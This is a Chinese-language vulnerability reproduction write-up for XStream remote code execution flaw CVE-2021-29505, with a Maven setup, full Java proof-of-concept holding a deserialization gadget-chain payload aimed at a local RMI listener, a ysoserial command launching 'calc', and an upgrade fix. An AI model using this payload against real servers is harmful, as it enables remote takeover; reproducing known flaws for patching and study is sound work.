0x01 漏洞介绍
xStream是一个Java对象和XML相互转换的工具,很好很强大。提供了所有的基础类型、数组、集合等类型直接转换的支持。因此XML常用于数据交换、对象序列化(这种序列化和Java对象的序列化技术有着本质的区别)
xStream存在远程代码执行漏洞(CVE-2021-29505),该漏洞允许远程攻击者直接获取服务器权限,漏洞级别严重。
0x02 漏洞编号
CVE-2021-29505
0x03 漏洞等级
漏洞等级:严重
0x04 影响范围
xStream <= 1.4.16
0x05 漏洞POC
POC参考地址:
https://x-stream.github.io/CVE-2021-29505.html
0x06 漏洞复现
ide中创建一个maven项目,pom.xml中配置如下信息:
<project xmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><groupId>org.example</groupId><artifactId>XStream</artifactId><version>1.0-SNAPSHOT</version><build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-compiler-plugin</artifactId><configuration><source>7</source><target>7</target></configuration></plugin></plugins></build><dependencies><dependency><groupId>com.thoughtworks.xstream</groupId><artifactId>xstream</artifactId><version>1.4.16</version></dependency><dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.0</version></dependency></dependencies></project>
新建POC代码:
import com.thoughtworks.xstream.XStream;import java.io.File;public class CVE_2021_29505 {public static void main(String[] args){String pocXml = "<java.util.PriorityQueue serialization='custom'>n" +" <unserializable-parents/>n" +" <java.util.PriorityQueue>n" +" <default>n" +" <size>2</size>n" +" </default>n" +" <int>3</int>n" +" <javax.naming.ldap.Rdn_-RdnEntry>n" +" <type>12345</type>n" +" <value class='com.sun.org.apache.xpath.internal.objects.XString'>n" +" <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>n" +" </value>n" +" </javax.naming.ldap.Rdn_-RdnEntry>n" +" <javax.naming.ldap.Rdn_-RdnEntry>n" +" <type>12345</type>n" +" <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>n" +" <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>n" +" <parsedMessage>true</parsedMessage>n" +" <soapVersion>SOAP_11</soapVersion>n" +" <bodyParts/>n" +" <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>n" +" <attachmentsInitialized>false</attachmentsInitialized>n" +" <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>n" +" <soapPart/>n" +" <mm>n" +" <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>n" +" <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>n" +" <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>n" +" <names>n" +" <string>aa</string>n" +" <string>aa</string>n" +" </names>n" +" <ctx>n" +" <environment/>n" +" <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>n" +" <java.rmi.server.RemoteObject>n" +" <string>UnicastRef</string>n" +" <string>127.0.0.1</string>n" +" <int>1096</int>n" +" <long>0</long>n" +" <int>0</int>n" +" <long>0</long>n" +" <short>0</short>n" +" <boolean>false</boolean>n" +" </java.rmi.server.RemoteObject>n" +" </registry>n" +" <host>127.0.0.1</host>n" +" <port>1096</port>n" +" </ctx>n" +" </candidates>n" +" </aliases>n" +" </it>n" +" </mm>n" +" </multiPart>n" +" </sm>n" +" </message>n" +" </value>n" +" </javax.naming.ldap.Rdn_-RdnEntry>n" +" </java.util.PriorityQueue>n" +"</java.util.PriorityQueue>";System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");XStream xStream = new XStream();xStream.fromXML(pocXml);}}
然后本地使用ysoserial.jar监听RMI服务
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1096 CommonsCollections4 'calc'运行poc:
0x07 漏洞修复
升级XStream到1.4.17版本及以上版本。
本文始发于微信公众号(锋刃科技):xStream 远程代码执行高危漏洞复现(CVE-2021-29505)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论